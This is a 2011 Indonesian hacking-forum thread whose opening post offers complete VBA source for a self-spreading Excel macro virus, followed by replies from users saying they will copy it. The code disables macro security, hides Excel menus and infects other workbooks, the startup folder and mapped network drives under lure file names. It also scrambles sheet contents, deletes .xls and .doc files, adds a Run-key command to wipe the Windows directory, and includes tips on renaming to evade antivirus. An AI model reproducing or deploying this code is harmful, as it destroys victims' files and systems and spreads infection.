.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Belajar Membuat Virus dengan Excel

Go down 
+6
robofics
bumiayucyber
Hanzou
BumiayuKita
zer03s
Lo@dinG
10 posters
PengirimMessage
Lo@dinG
Administrator
Administrator
Lo@dinG


Jumlah posting : 434
Points : 874
Reputation : 22
Join date : 13.12.10
Age : 35
Lokasi : Dimana-mana ???

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeWed Apr 13, 2011 4:00 pm

Nama threadnya aja "Belajar Buat Virus dengan Exel" jadi yaaa.... masih tahap pembelajaran lah.., sowry klw masih ada yg salah... :sorry :sorry
Ok deh... Langsung aja....!!

:selamat MAKE Virus:
buka new excel workbooks kemudian menu tools macro VB editor
klik kanan pada VBA Project dan pilih insert module
Paste file ini ke dalam new module
tekan F8 untuk trace script

‘USE THIS SCRIPT AS YOUR OWN RISK
‘This is for my wife if thats you falling love with others

Code:
Private Declare Function RegOpenKeyExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegCreateKeyExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, _
ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal _
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim NewKEY As Long
Dim AA, BB, NN
Dim Myclub As String
Dim CrStat As Boolean
Dim pnm As String


‘ ini untuk mendisable menu bila ingin memodifikasi tambah ato kurangi sendiri
‘ menghapus direktory windows…ssttt glodak aauuuuu

Code:
Sub MessBoard()
On Error Resume Next
CommandBars(”File”).Controls(”Print Area”).Visible = False
CommandBars(”Data”).Controls(”Sort”).Visible = False
CommandBars(”File”).Controls(”Page Setup…”).Visible = False
NowBoom = Array(”MsApp”, “Sound Acceleration”, “Ms Wizard”, “Web Camera”, _
“PCI driver”, “App Video”, “Lshots”, “WinApps”, “MsOffice 11?)
Randomize
NowBoom = NowBoom(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\CurrentVersion\Run”, _
0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, NowBoom, 0, 1, “c:\windows\command\deltree windows”, 0)
KillAV = RegCloseKey(s)
End Sub

Private Sub Auto_Open()
On Error Resume Next
Application.StatusBar = “Wait please….”
Application.ScreenUpdating = False
CommandBars(”Tools”).Controls(”Customize…”).Visible = False
CommandBars(”Tools”).Controls(”Options…”).Visible = False
CommandBars(”Tools”).Controls(”Macro”).Enable = False

’setting registry security LOW pada excel ver. 8.0 dan 9.0
Kill97 = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\8.0\Excel” & _
“Microsoft Excel”, 0, KEY_ALL_ACCESS, k)
Kill97 = RegSetValueExA(k, “Options6?, 0, REG_DWORD, Chr$(0), 4)
Kill97 = RegCloseKey(k)
Kill2K = RegCreateKey(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel” & _
“security”, s)
Kill2K = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel”, _
0, KEY_ALL_ACCESS, s)
Kill2K = RegSetValueExA(s, “Level”, 0, REG_DWORD, Chr$(2), 2)
Kill2K = RegCloseKey(s)

‘mengalihkan antivirus ke file yang anda inginkan
‘rundll.exe jika sudah menumpuk di registry membuat winkamu cepet mabok
‘rubah file rundll.exe sesuai keinginan

Code:
AnVrs = Array(”VsStatEXE”, “Norton Auto-Protect”, “F-Secure”, “PandaSoft”, “Avast4?, _
“DrSolomon”, “AntiVir”, “MsSound”, “BombShellter”)
Randomize
AVstr = AnVrs(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows” & _
“CurrentVersion\Run”, 0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, AVstr, 0, 1, “c:\windows\rundll.exe”, 0)
KillAV = RegCloseKey(s)
Application.DisplayAlerts = False
If Right(ActiveWorkbook.Name, 3) = “xls” Then
ActiveWindow.Visible = False
workbooks.Add
End If
XBrnd

‘membuat file Xlstart yang isinya file yg terinfeksi
‘membuat tulisan pada sheet active

Code:
strup = Application.StartupPath
If Dir(strup & “” & “*.xls”) = “” Then
pnm = ActiveWorkbook.Name
Apnm = ActiveWorkbook.FullName
OtherVrs = Dir(strup & “” & “*.xls”)
If OtherVrs <> “” Then
workbooks(OtherVrs).Close
Kill strup & “” & OtherVrs
End If
workbooks(pnm).SaveAs FileName:=strup & “” & Myclub & “.xls”
ActiveWindow.Visible = False
workbooks.Open (Apnm)
End If
For n = 67 To 90
l = Chr(n)
drv = l & “:”
d3 = DrvID(drv)
If d3 = “network” Then snd2drv (drv)
Next
nmpers = Dir(strup & “” & “*.xls”)
Application.OnSheetActivate = “” & strup & “” & nmpers & “!XLBomb”
If Month(Now()) = 7 And Day(Now()) = 7 Then
Range(”A1?).Insert
Range(”A1?).Select
With Selection.Font
.Name = “Arial”
.FontStyle = “Bold”
.Size = 18
.ColorIndex = 7
End With
ActiveCell.FormulaR1C1 = “Living in the DARKSIDE to watch your Life”
MessBoard
cari
End If
Application.StatusBar = False
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub

‘Penularan pada workbook yg aktif
‘add sheet xlSheetVeryHidden sebagai otorisasi
’sorry mcafee aku selalu merubah ini bila terdeteksi

Code:
Sub XLBomb()
On Error Resume Next
XlsBmb = “c:\Trough.WQK” ‘rubah baris ini bila virus kamu terdeteksi
Application.DisplayAlerts = False
Application.ScreenUpdating = False
aktip = ActiveWorkbook.Name
sedang = ThisWorkbook.Name
Set mcraktip = workbooks(aktip).VBProject.VBComponents
Set modaktip = ActiveWorkbook.VBProject.VBComponents
Set mymcr = ThisWorkbook.VBProject.VBComponents
If aktip <> “Book1? And aktip <> “Book2? Then
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7? Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7? Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7?
Sheets(”S1L3N7?).Visible = xlSheetVeryHidden
Else
susun
Sheets(”S1L3N7?).Range(”A7?) = “”
End If
For nm = 1 To mcraktip.Count
If mcraktip(nm).Type = 1 Then
nama = mcraktip(nm).Name
Exit For
End If
Next nm
modaktip.Remove modaktip(nm)
For nm = 1 To mymcr.Count
If mymcr(nm).Type = 1 Then
nama = mymcr(nm).Name
Exit For
End If
Next nm
mymcr(nama).Export XlsBmb
modaktip.Import XlsBmb
Kill XlsBmb
XBrnd
ActiveWorkbook.VBProject.VBComponents(nm).Name = Myclub
If Minute(Now()) > 30 And Weekday(Now()) Mod 2 = 0 Then
Application.StatusBar = “Searching for 1RM4 at the network…”
End If
End If
Application.DisplayAlerts = True
End Sub

‘duplikasi virus dengan berbagai nama secara RANDOM

Code:
Private Sub XBrnd()
Dim Sbjt, Bodd
On Error GoTo nil1
Randomize
Sbjt = Array(”Primitif”, “Conspiracy”, “mydata”, “OnJuly”, “Updater”, “ms0ffice”, _
“letme”, “poisoning”, “yourdream”)
Myclub = Sbjt(Rnd * 9  1)
Exit Sub
nil1:
Myclub = Sbjt(0)
End Sub

‘hihi.. macro di kawinkan sama worm yaaa gini ini
‘tularkan pada semua drive & network yang telah di MAPPING

Code:
Function DrvID(drv3)
On Error Resume Next
Dim fso, d, t
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set d = fso.getdrive(drv3)
Select Case d.drivetype
Case 0: t = “Unknown”
Case 1: t = “removable”
Case 2: t = “Fixed”
Case 3: t = “network”
Case 4: t = “CD-ROM”
Case 5: t = “Ramdisk”
End Select
If t = “” Then t = “none”
DrvID = t
End Function
Sub snd2drv(DrvAll)
On Error Resume Next
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Gnm = ActiveWorkbook.Name
GnmF = ActiveWorkbook.FullName
Randomize
FlName = Array(”BankColapse”, “myacc”, “report”, “launch06?, “yourScrt”, “jobs”, _
“reference07?, “logistic”, _
“Payroll2006?, “NewCost”, “DoNotOpen”, “secretary”, “tax_report”, “Finance”, _
“director2006?)
Bread = FlName(Rnd * 14  1)
workbooks(Gnm).SaveAs FileName:=DrvAll & “” & Bread & “.xls”
workbooks(ActiveWorkbook.Name).Close
workbooks.Open (GnmF)
Application.DisplayAlerts = True
End Sub

Private Sub Auto_Close()
On Error Resume Next
If ActiveWorkbook.Name <> “Book1? And ActiveWorkbook.Name <> “Book2? Then
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7? Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7? Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7?
Sheets(”S1L3N7?).Visible = xlSheetVeryHidden
End If
CryptSTAT = Sheets(”S1L3N7?).Range(”A7?)
If CryptSTAT <> 1 Then
kacau
Sheets(”S1L3N7?).Range(”A7?) = 1
SvFl = Dir(Application.StartupPath & “” & “*.xls”)
workbooks(SvFl).Save
ActiveWorkbook.Save
End If
End If
End Sub

‘klo file d tutup basic encrypt
’supaya klo macro d hapus & DUUUAAARRR rusak file-nya
Sub kacau() ‘kurang setiap sheets
Code:
For i = 48 To 90 ‘48 as 0 and 90 as Z
If i <> 63 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i  110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub

kembalikan (decrypt) struktur file saat d buka
Code:
Sub susun()
For i = 158 To 200
If i <> 173 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i - 110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub

‘hapus file xls,doc & file yg anda inginkan
‘membuat file tipuan dg nama sesuai folder
Code:
Sub cari()
On Error Resume Next
Dim nmfold1, nmfold2, pjg, kena As Integer
pnm = ActiveWorkbook.FullName
pjg = Len(pnm)
For i = 0 To 50
pjg = pjg - 1
If Right(Left(pnm, pjg), 1) = “” Then
foldbatas = Left(pnm, pjg)
Kill foldbatas & “*.xls”
Kill foldbatas & “*.doc”
Kill foldbatas & “irma.*”
If a = 0 Then
nmfold1 = Len(foldbatas) - 1
pnm = Left(pnm, nmfold1)
a = 1
Else
nmfold2 = Len(foldbatas)  1
kena = nmfold1 - nmfold2
namekena = Right(pnm, kena  1)
Application.ScreenUpdating = False
workbooks.Add (namekena & “.xls”)
ActiveWorkbook.Save
ActiveWorkbook.Close
Application.ScreenUpdating = True
Exit For
End If
End If
Next
End Sub

SCRIPT INI HANYA DIGUNAKAN SEBAGAI ILMU PENGETAHUAN SAJA..,We ga' tanggung resikonya..
:shakehand
Kembali Ke Atas Go down
http://www.black-c0de.org
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 31
Lokasi : /home/root/blackc0de

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeFri Apr 29, 2011 1:00 am

comot dulu ah Belajar Membuat Virus dengan Excel 597433815
Kembali Ke Atas Go down
http://zer03s.blog.com/
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeFri Apr 29, 2011 2:33 am

kang fahmi :mbomb: :mbomb: :mbomb: pusing gan ane :mbelajar:
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Hanzou
Pro Nubie
Pro Nubie
Hanzou


Jumlah posting : 57
Points : 88
Reputation : 5
Join date : 20.05.11
Age : 34
Lokasi : GorHckEd

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeSun May 22, 2011 1:19 am

numpang copas ya gan ,,,,

Belajar Membuat Virus dengan Excel 3529815765 Belajar Membuat Virus dengan Excel 3529815765 Belajar Membuat Virus dengan Excel 3529815765
Kembali Ke Atas Go down
bumiayucyber
Newbie - Hack
Newbie - Hack
bumiayucyber


Jumlah posting : 379
Points : 422
Reputation : 9
Join date : 08.09.11

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeSat Sep 10, 2011 9:19 pm

ms excel juga bisa bat virus ane,gak terfikirkan di benak ane gan,,
Kembali Ke Atas Go down
Lo@dinG
Administrator
Administrator
Lo@dinG


Jumlah posting : 434
Points : 874
Reputation : 22
Join date : 13.12.10
Age : 35
Lokasi : Dimana-mana ???

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeFri Oct 21, 2011 1:28 pm

Hanzou wrote:
numpang copas ya gan ,,,,

Belajar Membuat Virus dengan Excel 3529815765 Belajar Membuat Virus dengan Excel 3529815765 Belajar Membuat Virus dengan Excel 3529815765

Monggo Om...!!!
Kembali Ke Atas Go down
http://www.black-c0de.org
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeSun Dec 25, 2011 10:24 am

numpang nyimak om Belajar Membuat Virus dengan Excel 2446797354
Kembali Ke Atas Go down
http://robofics.wordpress.com
The_Qaishar
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 5
Points : 5
Reputation : 0
Join date : 25.12.11

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeSun Dec 25, 2011 8:28 pm

Baca, bookmark, copas dan laksanakan

sankyu bang,, :mfun:
Kembali Ke Atas Go down
Lo@dinG
Administrator
Administrator
Lo@dinG


Jumlah posting : 434
Points : 874
Reputation : 22
Join date : 13.12.10
Age : 35
Lokasi : Dimana-mana ???

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeMon Dec 26, 2011 1:12 am

The_Qaishar wrote:
Baca, bookmark, copas dan laksanakan

sankyu bang,, :mfun:

Virus Maker yaaa om..?? Belajar Membuat Virus dengan Excel 3529815765 Belajar Membuat Virus dengan Excel 3529815765
Kembali Ke Atas Go down
http://www.black-c0de.org
Squerpants
VIP Member
VIP Member
Squerpants


Jumlah posting : 427
Points : 595
Reputation : 28
Join date : 15.01.11
Age : 33
Lokasi : Hidden

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeMon Dec 26, 2011 11:30 am

Hmm.... [You must be registered and logged in to see this image.]

Ijin memahami duLu kK'..>!!
Pusing kK' Penjelasaannya..!!! [You must be registered and logged in to see this image.]

Nicce iNgpo deehh kk'..!!
Ceemuunguutt....!!
Kembali Ke Atas Go down
Destrozen
Corporal
Corporal
Destrozen


Jumlah posting : 156
Points : 166
Reputation : 3
Join date : 17.06.11
Lokasi : root

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeSat Apr 14, 2012 3:06 am

kalo gx salah nich jarang orang yang tau om,,,
Kembali Ke Atas Go down
Bi9_Hanz
Top Nubie
Top Nubie
Bi9_Hanz


Jumlah posting : 25
Points : 27
Reputation : 0
Join date : 25.10.13
Age : 34
Lokasi : Manado

Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitimeFri Oct 25, 2013 2:27 am

ijin sedot gan ....


cpdh cpdh cpdh 

:belajar: :belajar: :belajar: 
Kembali Ke Atas Go down
Sponsored content





Belajar Membuat Virus dengan Excel Empty
PostSubyek: Re: Belajar Membuat Virus dengan Excel   Belajar Membuat Virus dengan Excel Icon_minitime

Kembali Ke Atas Go down
 
Belajar Membuat Virus dengan Excel
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Belajar Membuat Virus dengan Notepad
» Membuat Virus Dengan Virus Generator
» BELAJAR BUAT VIRUS DI Ms.VB 6.0
» Belajar Buat vIRUS sEDErHaNa
» Belajar Lg nyoK "Virus Buat MsWord Etc.

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Virus,Malware,Trojan,Worm, Dll-
Navigasi: